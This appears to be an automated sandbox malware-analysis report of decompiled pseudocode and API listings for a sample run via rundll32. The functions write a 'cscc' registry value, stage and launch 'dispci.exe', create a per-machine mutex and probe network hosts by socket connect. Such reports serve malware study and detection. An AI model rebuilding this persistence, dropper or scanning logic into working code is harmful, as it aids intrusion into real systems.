                                                                                                                                                                                        							memmove(_t81 + _t68 - 0x80c,  &_v2064, _a4);
                                                                                                                                                                                        							memcpy( &_v2064, L"cscc", _t68);
                                                                                                                                                                                        							_a4 = _a4 + _t68;
                                                                                                                                                                                        							_t60 = RegSetValueExW(_v12, _a8, 0, 7,  &_v2064, _a4); // executed
                                                                                                                                                                                        							_v8 = _t60;
                                                                                                                                                                                        							if(_t60 == 0) {
                                                                                                                                                                                        								_v8 = RegFlushKey(_v12);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							L23:
                                                                                                                                                                                        							RegCloseKey(_v12); // executed
                                                                                                                                                                                        							return _v8;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							L9:
                                                                                                                                                                                        							_t71 = L"cscc";
                                                                                                                                                                                        							_t62 = _t79;
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_t75 =  *_t62;
                                                                                                                                                                                        								if(_t75 !=  *_t71) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								if(_t75 == 0) {
                                                                                                                                                                                        									L14:
                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                        									L16:
                                                                                                                                                                                        									if(_t62 == 0) {
                                                                                                                                                                                        										goto L23;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t63 = _t79;
                                                                                                                                                                                        									_t76 =  &(_t63[2]);
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t72 =  *_t63;
                                                                                                                                                                                        										_t63 =  &(_t63[2]);
                                                                                                                                                                                        									} while (_t72 != 0);
                                                                                                                                                                                        									goto L19;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t77 = _t62[2];
                                                                                                                                                                                        								if(_t77 !=  *((intOrPtr*)(_t71 + 2))) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t62 =  &(_t62[4]);
                                                                                                                                                                                        								_t71 = _t71 + 4;
                                                                                                                                                                                        								if(_t77 != 0) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							asm("sbb eax, eax");
                                                                                                                                                                                        							asm("sbb eax, 0xffffffff");
                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                        							L19:
                                                                                                                                                                                        							_t79 =  &(_t79[2 + (_t63 - _t76 >> 1) * 2]);
                                                                                                                                                                                        						} while ( *_t79 != _t72);
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t73 = 2;
                                                                                                                                                                                        				if(_t49 != _t73) {
                                                                                                                                                                                        					goto L23;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v2064 = 0;
                                                                                                                                                                                        				_a4 = _t73;
                                                                                                                                                                                        				goto L20;
                                                                                                                                                                                        			}
























                                                                                                                                                                                        0x007b12c2
                                                                                                                                                                                        0x007b12cb
                                                                                                                                                                                        0x007b12cd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b12d3
                                                                                                                                                                                        0x007b12d5
                                                                                                                                                                                        0x007b12d8
                                                                                                                                                                                        0x007b12d8
                                                                                                                                                                                        0x007b12db
                                                                                                                                                                                        0x007b12de
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b12d8
                                                                                                                                                                                        0x007b12ad
                                                                                                                                                                                        0x007b12b5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b12b7
                                                                                                                                                                                        0x007b12ba
                                                                                                                                                                                        0x007b12c0
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b12c0
                                                                                                                                                                                        0x007b12c6
                                                                                                                                                                                        0x007b12c8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b12e3
                                                                                                                                                                                        0x007b12e7
                                                                                                                                                                                        0x007b12eb
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b1299
                                                                                                                                                                                        0x007b1279
                                                                                                                                                                                        0x007b125e
                                                                                                                                                                                        0x007b1261
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b1269
                                                                                                                                                                                        0x007b1270
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 007B1204
                                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 007B124F
                                                                                                                                                                                        • memmove.MSVCRT ref: 007B1302
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B1315
                                                                                                                                                                                        • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 007B1334
                                                                                                                                                                                        • RegFlushKey.ADVAPI32(00000800), ref: 007B1344
                                                                                                                                                                                        • RegCloseKey.KERNELBASE(00000800), ref: 007B1359
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                                                                                                                                                                        • String ID: cscc
                                                                                                                                                                                        • API String ID: 3731182797-3289078142
                                                                                                                                                                                        • Opcode ID: 3c21ee18b773845cafee3010efc1d54385dd5fbd9036e8293ceef22cc3c41833
                                                                                                                                                                                        • Instruction ID: 9f0939d26d427a7f0cf9d2b3bdf9da59c2e1bebbffd1662ee891fe68eb1a4d15
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c21ee18b773845cafee3010efc1d54385dd5fbd9036e8293ceef22cc3c41833
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A418871A00209ABDF209FA4CC55BEA7BB9FF14744F90C165E945E7290F739DA84CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                                        			E007B10A7() {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				short _v532;
                                                                                                                                                                                        				short _v1052;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                                        				signed char _t62;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                                        				short _t70;
                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				short _t73;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t62 = 2;
                                                                                                                                                                                        				_t73 = 0;
                                                                                                                                                                                        				if(( *0x7c7bc0 & _t62) == 0) {
                                                                                                                                                                                        					L20:
                                                                                                                                                                                        					return _t73;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(( *0x7c7b7c & 0x00000040) != 0) {
                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t17 = _t37 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                                                                                                        						_t64 =  *_t17 & 0x0000ffff;
                                                                                                                                                                                        						 *(_t75 + _t37 - 0x210) = _t64;
                                                                                                                                                                                        						_t37 = _t37 + _t62;
                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                        					} while (_t64 != 0);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%",  &_v532, 0x104);
                                                                                                                                                                                        					_t55 =  &_v532;
                                                                                                                                                                                        					_t71 = _t55 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t67 =  *_t55;
                                                                                                                                                                                        						_t55 = _t55 + _t62;
                                                                                                                                                                                        					} while (_t67 != 0);
                                                                                                                                                                                        					_t58 = (_t55 - _t71 >> 1) + (_t55 - _t71 >> 1);
                                                                                                                                                                                        					if( *((short*)(_t75 + _t58 - 0x212)) == 0x5c) {
                                                                                                                                                                                        						L10:
                                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t65 =  *(_t75 + _t38 - 0x210) & 0x0000ffff;
                                                                                                                                                                                        							 *(_t75 + _t38 - 0x418) = _t65;
                                                                                                                                                                                        							_t38 = _t38 + _t62;
                                                                                                                                                                                        						} while (_t65 != 0);
                                                                                                                                                                                        						_push( &_v12);
                                                                                                                                                                                        						_push( &_v8);
                                                                                                                                                                                        						_t41 = 9; // executed
                                                                                                                                                                                        						_t42 = E007B8313(_t41); // executed
                                                                                                                                                                                        						if(_t42 == 0) {
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t43 = 0;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t66 =  *(_t75 + _t43 - 0x210) & 0x0000ffff;
                                                                                                                                                                                        							 *(_t75 + _t43 - 0x418) = _t66;
                                                                                                                                                                                        							_t43 = _t43 + _t62;
                                                                                                                                                                                        						} while (_t66 != 0);
                                                                                                                                                                                        						if(PathAppendW( &_v1052, L"dispci.exe") != 0) {
                                                                                                                                                                                        							_t49 = E007B87E7(_v12,  &_v1052, _v8); // executed
                                                                                                                                                                                        							_t88 = _t49;
                                                                                                                                                                                        							if(_t49 != 0) {
                                                                                                                                                                                        								E007B1000(_t88,  &_v532); // executed
                                                                                                                                                                                        								if(E007B1531() == 0) {
                                                                                                                                                                                        									_t73 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *((short*)(_t75 + _t58 - 0x20e)) = 0;
                                                                                                                                                                                        					_t59 =  &_v532;
                                                                                                                                                                                        					_t72 = _t59 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t69 =  *_t59;
                                                                                                                                                                                        						_t59 = _t59 + _t62;
                                                                                                                                                                                        					} while (_t69 != 0);
                                                                                                                                                                                        					_t70 = 0x5c;
                                                                                                                                                                                        					 *((short*)(_t75 + (_t59 - _t72 >> 1) * 2 - 0x210)) = _t70;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}





























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 007B10DD
                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 007B119F
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B11DC
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 007B11E3
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                                                                                                                                                                        • String ID: Oet Uet0Xet$%ALLUSERSPROFILE%$\$dispci.exe
                                                                                                                                                                                        • API String ID: 1077166327-2496986081
                                                                                                                                                                                        • Opcode ID: 13e2994a7c69a76bc08413846564571950310df8357c7f8f1f3882da459429f8
                                                                                                                                                                                        • Instruction ID: 5e1b97b4f3b40c271cc964716074cbad0a607f257c479110793aeb3e79afc7f1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 13e2994a7c69a76bc08413846564571950310df8357c7f8f1f3882da459429f8
                                                                                                                                                                                        • Instruction Fuzzy Hash: CD31737154020EDACB10ABEC9CA9FEA77A8FF14754F944879EA05C3190F66C8E848B64
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                        			E007B77D1() {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 =  *0x7c7bb8;
                                                                                                                                                                                        				E007B6B95(L"127.0.0.1", 1);
                                                                                                                                                                                        				E007B6B95(L"localhost", 1, _t21); // executed
                                                                                                                                                                                        				E007B6B95(L"0.0.0.0", 1, _t21);
                                                                                                                                                                                        				_t12 =  &_v528;
                                                                                                                                                                                        				_v8 = 0x104;
                                                                                                                                                                                        				__imp__GetComputerNameExW(4, _t12,  &_v8);
                                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                                        					E007B6B95( &_v528, 1, _t21);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t13 = CreateThread(0, 0, E007B8B2E, _t21, 0, 0); // executed
                                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                                        					FindCloseChangeNotification(_t13); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                                        				L5:
                                                                                                                                                                                        				E007B733C(_t21); // executed
                                                                                                                                                                                        				E007B742C(_t21); // executed
                                                                                                                                                                                        				if(_t24 == 0) {
                                                                                                                                                                                        					E007B751B(_t21, 0x80000000, 0); // executed
                                                                                                                                                                                        					_t24 = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				Sleep(0x2bf20);
                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 007B781B
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 007B783D
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 007B7848
                                                                                                                                                                                        • Sleep.KERNEL32(0002BF20,?,?), ref: 007B7874
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
                                                                                                                                                                                        • String ID: 0.0.0.0$127.0.0.1$localhost
                                                                                                                                                                                        • API String ID: 3743365020-4042105963
                                                                                                                                                                                        • Opcode ID: 12e6922bf68ead640b3ff6b32febe3949370a29b18a14eb7959ac57d0fcceca0
                                                                                                                                                                                        • Instruction ID: 2f3e017ad2e02b95db775c86c7381285170c3339b1dacb1dfb81f13ac55bdc7c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e6922bf68ead640b3ff6b32febe3949370a29b18a14eb7959ac57d0fcceca0
                                                                                                                                                                                        • Instruction Fuzzy Hash: B50175F1504118BAD7347BB55C8DFEBBABCDB85B50F510278BA01E2052EA6C9D01C9B1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                        			E007B8AB3(void* __ecx, void* _a4) {
                                                                                                                                                                                        				void _v8;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				intOrPtr _t10;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void _t21;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = _a4;
                                                                                                                                                                                        				_t21 =  *_t30;
                                                                                                                                                                                        				_t10 =  *((intOrPtr*)(_t30 + 4));
                                                                                                                                                                                        				_v8 = _t21;
                                                                                                                                                                                        				_v12 = _t10;
                                                                                                                                                                                        				if(_t21 >= _t10) {
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					LocalFree(_t30);
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t28 = __imp__#14;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t14 = E007BA567( *_t28(_t21)); // executed
                                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                                        						__imp__#12( *_t28(_t21));
                                                                                                                                                                                        						_t24 = E007B641A(_t15);
                                                                                                                                                                                        						if(_t24 != 0) {
                                                                                                                                                                                        							E007B6B95(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                                                                                                        							_t30 = _a4;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t21 = _v8 + 1;
                                                                                                                                                                                        					_v8 = _t21;
                                                                                                                                                                                        				} while (_t21 < _v12);
                                                                                                                                                                                        				goto L6;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • htonl.WS2_32(74656490), ref: 007B8AD4
                                                                                                                                                                                        • htonl.WS2_32(74656490), ref: 007B8AE1
                                                                                                                                                                                        • inet_ntoa.WS2_32(00000000), ref: 007B8AE4
                                                                                                                                                                                          • Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
                                                                                                                                                                                          • Part of subcall function 007B641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
                                                                                                                                                                                          • Part of subcall function 007B641A: HeapAlloc.KERNEL32(00000000), ref: 007B644D
                                                                                                                                                                                          • Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 007B8B02
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 007B8B09
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B8B1F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 3470587009-3175316637
                                                                                                                                                                                        • Opcode ID: 22ddb7cd1d91459cd5d63b02f717e3e8efa5e8b494ca9b36794efc0c889c84cf
                                                                                                                                                                                        • Instruction ID: 0e8fae358813bd3faed0ba01cd9d3258c84b58126c9c99ee92d33a46b7cd71ba
                                                                                                                                                                                        • Opcode Fuzzy Hash: 22ddb7cd1d91459cd5d63b02f717e3e8efa5e8b494ca9b36794efc0c889c84cf
                                                                                                                                                                                        • Instruction Fuzzy Hash: 02010CB5900259ABCB10AFB5DD89E9FBBACFE483547148525E501E7201EA78EE00CA65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 007BA4A5
                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 007BA4C3
                                                                                                                                                                                        • htons.WS2_32(?), ref: 007BA4E3
                                                                                                                                                                                        • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 007BA4F7
                                                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 007BA509
                                                                                                                                                                                        • select.WS2_32(00000001,00000000,?,00000000,?), ref: 007BA536
                                                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 007BA549
                                                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 007BA557
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1369790671-0
                                                                                                                                                                                        • Opcode ID: 7f0a74859eefde4856d516d1130e76197b65936a7c848affdd6676bb87da8aed
                                                                                                                                                                                        • Instruction ID: 65aecba4a2c2715abffde1a70cbe8fb49c395f7f89ab204848cba35c386a92f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f0a74859eefde4856d516d1130e76197b65936a7c848affdd6676bb87da8aed
                                                                                                                                                                                        • Instruction Fuzzy Hash: B5312BB1800219BBDB209FA8CC48FEEBBBCEF48310F00466AF555E2150E7789A558B55
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                        			E007B7F04() {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void _v38;
                                                                                                                                                                                        				short _v40;
                                                                                                                                                                                        				void _v74;
                                                                                                                                                                                        				short _v76;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t33;
                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t35 = 7;
                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                        				memset( &_v38, 0, _t35 << 2);
                                                                                                                                                                                        				asm("stosw");
                                                                                                                                                                                        				_push(8);
                                                                                                                                                                                        				_v76 = 0;
                                                                                                                                                                                        				memset( &_v74, 0, 0 << 2);
                                                                                                                                                                                        				_t33 = 0;
                                                                                                                                                                                        				_v8 = 0x10;
                                                                                                                                                                                        				if(GetComputerNameW( &_v40,  &_v8) == 0) {
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					return _t33;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t46 = 0;
                                                                                                                                                                                        					_t23 = E007B7D8D(0,  &_v40, _v8);
                                                                                                                                                                                        					_t39 =  *0x7c3984; // 0x444ff8
                                                                                                                                                                                        					_t44 = _t23;
                                                                                                                                                                                        					if(_t39 != 0) {
                                                                                                                                                                                        						_t30 =  *0x7c7b94;
                                                                                                                                                                                        						if( *0x7c7b94 != 0) {
                                                                                                                                                                                        							_t46 = E007B7D8D(_t39, _t39, _t30 >> 1);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					wsprintfW( &_v76, L"%08X%08X", _t44, _t46);
                                                                                                                                                                                        					_t27 = CreateMutexW(_t33, _t33,  &_v76); // executed
                                                                                                                                                                                        					if(_t27 == 0) {
                                                                                                                                                                                        						GetLastError();
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						if(GetLastError() == 0xb7) {
                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}
















                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$ComputerCreateMutexNamewsprintf
                                                                                                                                                                                        • String ID: %08X%08X
                                                                                                                                                                                        • API String ID: 4289762557-1563805794
                                                                                                                                                                                        • Opcode ID: a079c161e64a6ab225680e2a43e3e0f21cbac32e03f8ef38820f4afb776966e1
                                                                                                                                                                                        • Instruction ID: bd572d3de94dff23da87a88130d38a4b524cec6311335694daae1ddc26548bf0
                                                                                                                                                                                        • Opcode Fuzzy Hash: a079c161e64a6ab225680e2a43e3e0f21cbac32e03f8ef38820f4afb776966e1
                                                                                                                                                                                        • Instruction Fuzzy Hash: CA117C72A04149AFDB14DBA4DC88EEEB7BDEF88344F104569F501E2150EB789E06CB69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007BA420(void* __ecx, void _a4) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_t20 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                        					 *_t20 = _a4; // executed
                                                                                                                                                                                        					_t9 = CreateThread(0, 0, E007BA333, _t20, 0, 0); // executed
                                                                                                                                                                                        					_v8 = _t9;
                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t20);
                                                                                                                                                                                        					}
